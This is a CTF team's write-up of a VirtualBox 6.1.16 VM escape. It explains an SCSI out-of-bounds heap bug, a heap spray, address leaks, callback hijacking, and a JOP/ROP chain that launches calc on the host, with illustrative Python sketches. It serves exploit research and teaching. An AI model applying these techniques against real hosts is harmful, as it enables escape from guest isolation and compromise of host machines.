This post is about a VirtualBox VM escape exploit that existed in VirtualBox 6.1.16 on Windows.
Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, to M4x for always being helpful, answering our questions and sitting with us through the many demo attempts, and of course to all the people involved in writing the exploit.
Let’s get to some pwning 😀
Discovering the Vulnerability
The challenge description already hints at where a bug might be:
Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.
You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.
But you can’t do anything in the host, including modifying the guest configuration file, etc.
Hint: SCSI controller is enabled and marked as bootable.
In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:
- Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
- Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.
The only special thing about the VM is that the SCSI driver is loaded and marked bootable, so that’s the place for us to start looking for vulnerabilities.
Here are the operations the SCSI device supports:
The SCSI device implements a simple state machine with a global heap-allocated buffer. When initiating the state machine, we can set the buffer size, and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes or write one or more bytes. Every read/write operation advances the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.
We can fully control cbTransfer in this function. The function initially makes sure that we’re not trying to read more than the buffer size. Then, it copies cbTransfer bytes from the global buffer into another buffer, which will be sent to the guest driver. Finally, cbTransfer bytes get subtracted from the remaining size of the buffer, and if that remaining size hits zero, it will reset the SCSI device and require the user to reinitiate the state machine before reading any more bytes.
So much for the logic, but what’s the issue here? There is a check that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check won’t bail out, since 2 is less than the buffer size of 40; however, we will have read 41 bytes in total. Additionally, this will cause the subtraction to underflow (1 - 2 wraps around as an unsigned 32-bit value) and cbBufLeft will be set to UINT32_MAX. This same cbBufLeft will be checked when doing write operations, and since it is very large now, we’ll also be able to write bytes that are outside of our buffer.
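To make the flawed check concrete, here is a toy Python model of the state machine as described above. It is only a sketch: the class ToyScsi, its field names and the bytearray standing in for the host heap are made up for illustration, the reset on reaching zero is left out, and none of this is the actual VirtualBox code.

```python
MASK32 = 0xFFFFFFFF  # cbBufLeft behaves like an unsigned 32-bit counter


class ToyScsi:
    """Toy model of the read/write state machine (hypothetical names)."""

    def __init__(self, heap: bytearray, buf_start: int, cb_buf: int):
        self.heap = heap            # stand-in for the host heap
        self.buf_start = buf_start  # where "our" buffer starts in that heap
        self.cb_buf = cb_buf        # total buffer size
        self.cb_buf_left = cb_buf   # bytes the device believes are left
        self.i_buf = 0              # current position inside the buffer

    def read(self, cb_transfer: int) -> bytes:
        # Flawed check: compares against the total size, not what is left.
        if cb_transfer > self.cb_buf:
            cb_transfer = self.cb_buf
        pos = self.buf_start + self.i_buf
        data = bytes(self.heap[pos:pos + cb_transfer])
        self.i_buf += cb_transfer
        # Unsigned subtraction: wraps around if cb_transfer > cb_buf_left.
        self.cb_buf_left = (self.cb_buf_left - cb_transfer) & MASK32
        return data

    def write(self, data: bytes) -> None:
        # Writes are bounded by cb_buf_left, which is huge after the wrap.
        if len(data) > self.cb_buf_left:
            raise ValueError("write exceeds remaining buffer")
        pos = self.buf_start + self.i_buf
        self.heap[pos:pos + len(data)] = data
        self.i_buf += len(data)
        self.cb_buf_left = (self.cb_buf_left - len(data)) & MASK32


# 40-byte buffer followed by data that belongs to a neighbouring allocation.
heap = bytearray(b"A" * 40 + b"NEIGHBOR" + bytes(16))
dev = ToyScsi(heap, buf_start=0, cb_buf=40)
dev.read(39)          # legitimate read, one byte left
leak = dev.read(2)    # passes the check (2 <= 40) but crosses the buffer end
dev.write(b"XXXX")    # accepted because cb_buf_left wrapped around
print(leak, bytes(heap[40:48]))
```

The second read returns one byte of the neighbouring data, and the write that follows lands entirely outside the 40-byte buffer.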
Getting OOB read/write
We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.
Here’s how we triggered the bug:
The driver first has to initiate the SCSI state machine with a bufsize. Then we read bufsize-1 bytes and then we read 9 bytes. We chose 9 instead of 2 bytes in order to have the buffer pointer 8-byte aligned after the overflow. Finally, we overwrite the next 10000 KB after our allocated buffer.
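The choice of 9 over 2 comes down to simple offset arithmetic. The snippet below is a small sketch of it, assuming the buffer itself starts at an 8-byte aligned address and using 0x70 as an example bufsize; the helper name is made up.

```python
def position_after_trigger(bufsize: int, second_read: int) -> int:
    """Buffer offset after reading bufsize-1 bytes and then second_read bytes."""
    return (bufsize - 1) + second_read


BUFSIZE = 0x70  # example size, assumed to be a multiple of 8

for second_read in (2, 9):
    pos = position_after_trigger(BUFSIZE, second_read)
    aligned = pos % 8 == 0
    print(f"second read of {second_read}: offset {pos:#x}, 8-byte aligned: {aligned}")
```

With a second read of 9 bytes the pointer ends up exactly 8 bytes past the end of the buffer, so every following quad-word read or write lines up with the pointer-sized fields of whatever sits behind it.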
After loading this driver in the win7 guest, this is what we get:
As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works, and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept a Req struct from user-space. This enables us to use the driver as a bridge to communicate with the SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).
The bug gives us a linear heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution, so let’s put this bug to use!
vboxc.dll and heap addresses
We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.
This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:
- Contains a pointer into a dll
- Contains a heap address
- (Contains some kind of function pointer which might get useful later on)
After going through some options, we eventually opted for an HGCMMsgCall spray. Here’s its (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:
It contains a VTable pointer, two heap pointers (m_pNext and m_pPrev, because HGCMMsgCall objects are managed in a doubly linked list) and a callback function pointer, so HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the pHGCMPort->pfnIsCmdCancelled pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages whenever a new message is created.
HGCMMsgCall’s size is 0x70, so we’ll have to initiate the SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.
The wait_prop function will allocate an HGCMMsgCall object with a controlled pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.
Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:
- We iterate 64 times
- Each time we create a client and spray 16 HGCMMsgCall objects
That way, we seemed to reliably get a bunch of the HGCMMsgCalls ahead of our leak object, which allows us to read and write their fields.
First things first: getting the code leak is simple enough. All we have to do is read heap memory until we find something that matches the structure of one of our HGCMMsgCall objects and read the first quad-word of said object. The VTable points into VBoxC.dll, so we can use this leak to calculate the base address of VBoxC.dll for future use.
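The base address calculation boils down to one subtraction. Here is a minimal sketch, assuming we already know the offset (RVA) of the HGCMMsgCall VTable inside VBoxC.dll for the exact build in use. The RVA and the addresses below are made-up placeholders, not values from the real binary.

```python
import struct

HYPOTHETICAL_VTABLE_RVA = 0x1A2B30  # placeholder, depends on the VBoxC.dll build


def vboxc_base_from_object(obj_bytes: bytes, vtable_rva: int) -> int:
    """Read the first quad-word of a leaked object and subtract the VTable RVA."""
    (vtable_ptr,) = struct.unpack_from("<Q", obj_bytes, 0)
    base = vtable_ptr - vtable_rva
    # DLLs are mapped at 64 KiB aligned addresses, which gives a cheap sanity check.
    if base & 0xFFFF:
        raise ValueError("base is not 64 KiB aligned: wrong object or wrong RVA")
    return base


# Fake leaked object: VTable pointer followed by the rest of the 0x70 bytes.
fake_base = 0x7FFA12340000
leaked = struct.pack("<Q", fake_base + HYPOTHETICAL_VTABLE_RVA) + bytes(0x68)
print(hex(vboxc_base_from_object(leaked, HYPOTHETICAL_VTABLE_RVA)))
```

Every gadget address used later is then just this base plus the gadget's offset in the same build of the DLL.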
Getting the heap leak is not as straightforward. We can easily read the m_pNext and m_pPrev fields to get a pointer to some other HGCMMsgCall object, but we don’t have any clue about where that object is located relative to our current buffer position. So reading these pointers from one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object A to its next neighbor B.
This works because of a basic property of doubly linked lists: if B directly follows A in the list, A->m_pNext points to B and B->m_pPrev points to A.
To get the address of B, we have to do the following:
- Read object A and save the pointers
- Take note of how many bytes we had to read until we found the next object B in a variable x
- Read object B and save the pointers
- If A->m_pNext - B->m_pPrev == x, we most likely found the right neighbor and know that B is located at A->m_pNext. If not, we just keep reading objects
This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll base address leak, we can move on to hijacking the execution flow.
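The neighbor matching can be sketched in a few lines of Python. This is a simplified model, not our exploit code: it assumes the objects found by the OOB read have already been parsed into records holding their offset from the start of our buffer and their leaked m_pNext / m_pPrev values. The Seen type and all addresses are invented for the example.

```python
from typing import List, NamedTuple, Optional, Tuple


class Seen(NamedTuple):
    offset: int  # bytes read from the start of our buffer until this object
    p_next: int  # leaked m_pNext
    p_prev: int  # leaked m_pPrev


def find_neighbor(objs: List[Seen]) -> Optional[Tuple[int, int]]:
    """Return (offset of B, address of B) for the first consistent pair A, B."""
    for a, b in zip(objs, objs[1:]):
        x = b.offset - a.offset           # distance between A and B in memory
        if a.p_next - b.p_prev == x:      # A->m_pNext == &B and B->m_pPrev == &A
            return b.offset, a.p_next
    return None


# Three sprayed objects behind a buffer at the made-up address 0x1000.
objs = [
    Seen(offset=0x100, p_next=0x5000, p_prev=0x4000),  # neighbors live elsewhere
    Seen(offset=0x180, p_next=0x1200, p_prev=0x9000),  # A
    Seen(offset=0x200, p_next=0x7000, p_prev=0x1180),  # B, right behind A in the list
]
hit = find_neighbor(objs)
if hit is not None:
    b_offset, b_addr = hit
    # Knowing where B is and how far we read to reach it gives our buffer's address.
    print(hex(b_addr), hex(b_addr - b_offset))
```

Once a pair matches, subtracting B's offset from its address yields the address of our own buffer, which is what lets us turn offsets in the leak into absolute heap addresses.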
Getting RIP control
Remember the pfnIsCmdCancelled callbacks? Those will make for a very short “Getting RIP control” section… 😛
There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCalls and overwrite m_pfnCallback. As soon as a new message gets allocated, this method is called on our corrupted object with data we control. svcHlpIsCallCancelled will load a value we control into r8 and execute a jmp [r8+0x10] instruction. Here’s what happens if we corrupt it:
At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets, which are basically addresses you jump to that will instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in VBoxC.dll, which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control, so the only thing left is JOP (Jump-Oriented Programming).
JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register, r8. An additional constraint is that since we only leaked a pointer from VBoxC.dll, we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.
Sounds easy enough, let’s see what we can come up with 😛
Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns field in our spray for that. If we extend the pattern size to 0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68 bytes with our payload. We’re the ones who allocated that string, so it won’t get freed randomly as long as we hold a reference to it, and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.
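Finding the string and sizing the payload could look roughly like the sketch below. It assumes the heap data read through the OOB primitive is available as a bytes object together with the address it starts at. The magic value, the helper names and the addresses are placeholders.

```python
import struct
from typing import Iterable, Optional, Tuple

MAGIC = struct.pack("<Q", 0x4142434445464748)  # hypothetical marker quad-word
PATTERN_SIZE = 0x70                            # size of the sprayed pattern string
PAYLOAD_SIZE = PATTERN_SIZE - len(MAGIC)       # 0x68 bytes left for the payload


def locate_payload_slot(dump: bytes, dump_addr: int) -> Optional[Tuple[int, int]]:
    """Return (offset in dump, absolute address) of the bytes right after the magic."""
    idx = dump.find(MAGIC)
    if idx == -1:
        return None
    payload_off = idx + len(MAGIC)
    return payload_off, dump_addr + payload_off


def build_payload(qwords: Iterable[int]) -> bytes:
    """Pack quad-words little-endian and pad to exactly PAYLOAD_SIZE bytes."""
    raw = b"".join(struct.pack("<Q", q) for q in qwords)
    if len(raw) > PAYLOAD_SIZE:
        raise ValueError("payload does not fit behind the magic value")
    return raw.ljust(PAYLOAD_SIZE, b"\x00")


# Fake leak: 0x40 bytes of other data, then our pattern string.
dump = bytes(0x40) + MAGIC + b"B" * PAYLOAD_SIZE
slot = locate_payload_slot(dump, dump_addr=0x20000)
payload = build_payload([0x1111, 0x2222])
print(slot, len(payload))
```

The offset tells us how far to advance the device's buffer pointer before writing, and the absolute address is what goes into the chain wherever it needs to reference itself.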
After spending ~30min straight reading through VBoxC.dll assembly together with localo, we finally came up with a way to get from r8 control to rsp control. I had trouble figuring out a way to describe the JOP chain, so css wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as XXX and any reading or uncontrolled writing operations to or from those registers will be ignored.
Let’s assume r8 points to the JOP payload in our string. We trigger the callback, which will execute the jmp [r8+0x10]. You can click through the slides to understand what happens:
We managed to get rsp to point into our string and the next ret will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook WinExec("calc\x00") ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from the IAT. The IAT is comparable to a global offset table on Linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into kernel32.dll. Then we can calculate the runtime address of WinExec, set rcx to point to "calc\x00" and call WinExec, which will pop a calculator.
However, there is a little twist to this. A keen eye might have noticed that we set rbp to 0x10000000 and that we are using a leave; jmp rax gadget to get to rop_gadget_5 instead of just a simple jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec with the stack pointer still pointing into our heap payload. It turns out that WinExec sets up a rather large stack frame and the distance between our fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the vram section, which has weak randomisation, and it turns out that a range reaching up to 0x13220000 is always mapped by that section. So if we set rbp to 0x10000000 and call a leave; jmp rax, it will set the stack pointer to 0x10000000 before calling WinExec, thereby giving it enough space to do all the stack setup it likes 😉
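For readers less familiar with leave, here is a tiny Python model of what the leave; jmp rax gadget does to the registers. It is only an illustration: leave behaves like mov rsp, rbp followed by pop rbp, so rsp ends up 8 bytes above the value we put in rbp. The register values other than 0x10000000 are placeholders.

```python
def leave(regs: dict, memory: dict) -> None:
    """Model of x86-64 leave: mov rsp, rbp; pop rbp."""
    regs["rsp"] = regs["rbp"]                 # stack pointer moves to the new area
    regs["rbp"] = memory.get(regs["rsp"], 0)  # pop rbp (unwritten memory reads as 0 here)
    regs["rsp"] += 8                          # the pop consumes one quad-word


regs = {
    "rsp": 0x000001F0DEAD0040,  # placeholder: still pointing into our heap payload
    "rbp": 0x10000000,          # set earlier in the chain
    "rax": 0x7FFA00001234,      # placeholder for the next gadget's address
}
leave(regs, memory={})
next_rip = regs["rax"]          # jmp rax
print(hex(regs["rsp"]), hex(next_rip))
```

From here on, every push and every stack frame set up by WinExec grows downwards from that address instead of from our heap chunk.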
‘nuff said! Here’s the demo: https://www.youtube.com/embed/mjKxafMbpS0
You can find this version of our exploit here.
Writing this exploit was a joint effort of a bunch of people.
- ESPR’s spq, tsuro and malle who don’t need an introduction 😀
- My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo
- niklasb for his prior work and for some helpful pointers!
“A ROP chain a day keeps the doctor away. Always keep that in mind, my grandpa used to say.”
~ Niklas Baumstark (2021)
I had the pleasure of working with this group of talented people over multiple sleepless nights and days, during the CTF and even after it was over, just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you 😀
This was my first time working with VirtualBox, so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of VirtualBox with 3h left in the CTF, but sadly we weren’t able to port it to a release build in time due to anti-debugging in VirtualBox, which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox.